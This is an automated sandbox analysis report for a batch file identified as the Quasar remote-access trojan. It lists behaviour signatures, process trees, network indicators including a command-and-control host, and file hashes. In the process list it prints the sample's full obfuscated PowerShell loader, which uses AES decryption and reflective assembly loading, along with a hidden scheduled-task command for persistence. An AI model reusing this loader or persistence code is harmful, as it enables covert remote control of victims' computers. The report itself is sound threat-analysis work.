Analysis Overview
SHA256
ef70e618b652c777b3b2e589d1381bda6c7e49e7f2510334257c1e2add139045
Threat Level: Known bad
The file Space Paid v2.bat was found to be: Known bad.
Malicious Activity Summary
Quasar RAT
Quasar payload
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Looks up external IP address via web service
Drops file in System32 directory
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Runs ping.exe
Modifies registry class
Modifies data under HKEY_USERS
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-11 20:23
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-11 20:23
Reported
2024-06-11 20:26
Platform
win10-20240404-en
Max time kernel
143s
Max time network
136s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k rpcss
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Space Paid v2.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/SKWGkqWfBPts6TUnMgnDqYmX8MpEwLAo3HUHFOUjzI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ghwm5EhH8tXaBpOVD1X+Rg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $jqCXf=New-Object System.IO.MemoryStream(,$param_var); $YXcdm=New-Object System.IO.MemoryStream; $PKGkZ=New-Object System.IO.Compression.GZipStream($jqCXf, [IO.Compression.CompressionMode]::Decompress); $PKGkZ.CopyTo($YXcdm); $PKGkZ.Dispose(); $jqCXf.Dispose(); $YXcdm.Dispose(); $YXcdm.ToArray();}function execute_function($param_var,$param2_var){ $lmNqD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $AayDY=$lmNqD.EntryPoint; $AayDY.Invoke($null, $param2_var);}$CnPhd = 'C:\Users\Admin\AppData\Local\Temp\Space Paid v2.bat';$host.UI.RawUI.WindowTitle = $CnPhd;$LgROZ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($CnPhd).Split([Environment]::NewLine);foreach ($WnNUO in $LgROZ) { if ($WnNUO.StartsWith('wbcEgAsGQeSLuSguymAP')) { $gtIWp=$WnNUO.Substring(20); break; }}$payloads_var=[string[]]$gtIWp.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_710_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_710.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_710.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_710.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/SKWGkqWfBPts6TUnMgnDqYmX8MpEwLAo3HUHFOUjzI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ghwm5EhH8tXaBpOVD1X+Rg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $jqCXf=New-Object System.IO.MemoryStream(,$param_var); $YXcdm=New-Object System.IO.MemoryStream; $PKGkZ=New-Object System.IO.Compression.GZipStream($jqCXf, [IO.Compression.CompressionMode]::Decompress); $PKGkZ.CopyTo($YXcdm); $PKGkZ.Dispose(); $jqCXf.Dispose(); $YXcdm.Dispose(); $YXcdm.ToArray();}function execute_function($param_var,$param2_var){ $lmNqD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $AayDY=$lmNqD.EntryPoint; $AayDY.Invoke($null, $param2_var);}$CnPhd = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_710.bat';$host.UI.RawUI.WindowTitle = $CnPhd;$LgROZ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($CnPhd).Split([Environment]::NewLine);foreach ($WnNUO in $LgROZ) { if ($WnNUO.StartsWith('wbcEgAsGQeSLuSguymAP')) { $gtIWp=$WnNUO.Substring(20); break; }}$payloads_var=[string[]]$gtIWp.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nuwUg4MuldyS.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | runderscore00-63294.portmap.host | udp |
| DE | 193.161.193.99:63294 | runderscore00-63294.portmap.host | tcp |
| US | 8.8.8.8:53 | 99.193.161.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.65.42.20.in-addr.arpa | udp |
Files
memory/2156-2-0x00007FFE5C983000-0x00007FFE5C984000-memory.dmp
memory/2156-5-0x0000020BA84A0000-0x0000020BA84C2000-memory.dmp
memory/2156-9-0x00007FFE5C980000-0x00007FFE5D36C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n5eckjxr.egl.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2156-21-0x00007FFE5C980000-0x00007FFE5D36C000-memory.dmp
memory/2156-36-0x0000020BA8650000-0x0000020BA868C000-memory.dmp
memory/2156-47-0x0000020BA8AA0000-0x0000020BA8B16000-memory.dmp
memory/2156-56-0x00007FFE5C980000-0x00007FFE5D36C000-memory.dmp
memory/2156-57-0x0000020BA8690000-0x0000020BA8698000-memory.dmp
memory/2156-58-0x0000020BA8A20000-0x0000020BA8A90000-memory.dmp
memory/3632-70-0x00007FFE5C980000-0x00007FFE5D36C000-memory.dmp
memory/3632-73-0x00007FFE5C980000-0x00007FFE5D36C000-memory.dmp
memory/3632-74-0x00007FFE5C980000-0x00007FFE5D36C000-memory.dmp
memory/3632-104-0x00007FFE5C980000-0x00007FFE5D36C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8592ba100a78835a6b94d5949e13dfc1 |
| SHA1 | 63e901200ab9a57c7dd4c078d7f75dcd3b357020 |
| SHA256 | fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c |
| SHA512 | 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3 |
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_710.vbs
| MD5 | bef1d6774712f648f12f43eb50654e52 |
| SHA1 | 8b267bd0b2f617a000fd2ab8ff2346e7a3ab5e84 |
| SHA256 | bb2ebe3e6f8211e382cb089ecb688d07030588cb9b040b4f809837b66b7759e2 |
| SHA512 | 22c1d654685387f2a3297517749f2e5a28204a029477d1a566878e5b38bcc8162e10795df97d1731f29a13ff7a3fdbc876b4e5c56f048e4fe720ec6699550c11 |
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_710.bat
| MD5 | a5c3bef843c9d6022db92547f32855d1 |
| SHA1 | 816338da7ee45d496f39bbd36c6b106ee0b3e2fe |
| SHA256 | ef70e618b652c777b3b2e589d1381bda6c7e49e7f2510334257c1e2add139045 |
| SHA512 | 0e44e31275a89f29388418538f57cb3437ad1d24f08d0c3c7d85a1a906c5b212024f2960237b66e3f2838923497e82f198ad8c4ed0b34548190e6db03504f1bd |
memory/2156-117-0x00007FFE5C980000-0x00007FFE5D36C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | aeb24b5729d62e81a27174f46d431126 |
| SHA1 | baa02ac3f99822d1915bac666450dc20727494bb |
| SHA256 | d2b2e09bffd835255b1fb57c2aa92e5c28c080eb033e1f042087d36a93393471 |
| SHA512 | e62f6771339326a90f03b79f8a3321c4f00d66e5f228055f17b75d028895f80ce374bd0143ec971f55efa861b949ec672bfda9df7fb45444b17f3dbe479a5415 |
memory/2876-171-0x0000000002300000-0x000000000232A000-memory.dmp
memory/2876-206-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/1320-217-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/1228-226-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/1648-232-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/2716-233-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/1384-234-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/916-236-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/1412-235-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/828-227-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/876-231-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/4800-223-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/1908-230-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/2700-221-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/4300-220-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/1208-229-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/760-228-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/1772-219-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/1564-218-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/1072-225-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/1464-224-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/1528-222-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/4176-259-0x000002975D7A0000-0x000002975D7FE000-memory.dmp
memory/4176-260-0x000002975D4F0000-0x000002975D502000-memory.dmp
memory/4176-261-0x000002975DC40000-0x000002975DC7E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nuwUg4MuldyS.bat
| MD5 | 513249d6162178b1543d22794fd3101e |
| SHA1 | 2328040e93a4e71a0affce11d2820680232b55ab |
| SHA256 | 8d8cfceb69c6bce3c8a1fc936ac244fa867a7eb47448ddf02ab0695120d44781 |
| SHA512 | 28d9560803135500bbd658667e250b72dda908a7dcb9b88bc4e3cf461e27b2e795df5a9e328b0d17636d54a5c2b01f9b7abad47a1e26b111dd30b9d7776e4a49 |
C:\Users\Admin\AppData\Roaming\$sxr-Logs\06-11-~1
| MD5 | f6f99975c159f259c3cbb9864c582537 |
| SHA1 | 8336179843c4f0c1e1e56cc1ebf9dd8679906e65 |
| SHA256 | 5035b7e4e0fbc2d784da22f499af927cbb381948c07f072f014926ba551b9bb6 |
| SHA512 | 6a084c4698931220447448823973aa65d9ab3e896f245130fa2e36f3ffe944223a099231b02d1edb6f8b6765c7a0b92890c1dad641a7684d6554465e34c4a4d5 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-11 20:23
Reported
2024-06-11 20:26
Platform
win10v2004-20240611-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\SleepStudy\user-not-present-trace-2024-06-11-20-23-49.etl | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\SleepStudy\user-not-present-trace-2024-06-11-20-23-49.etl | C:\Windows\system32\svchost.exe | N/A |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\svchost.exe | N/A |
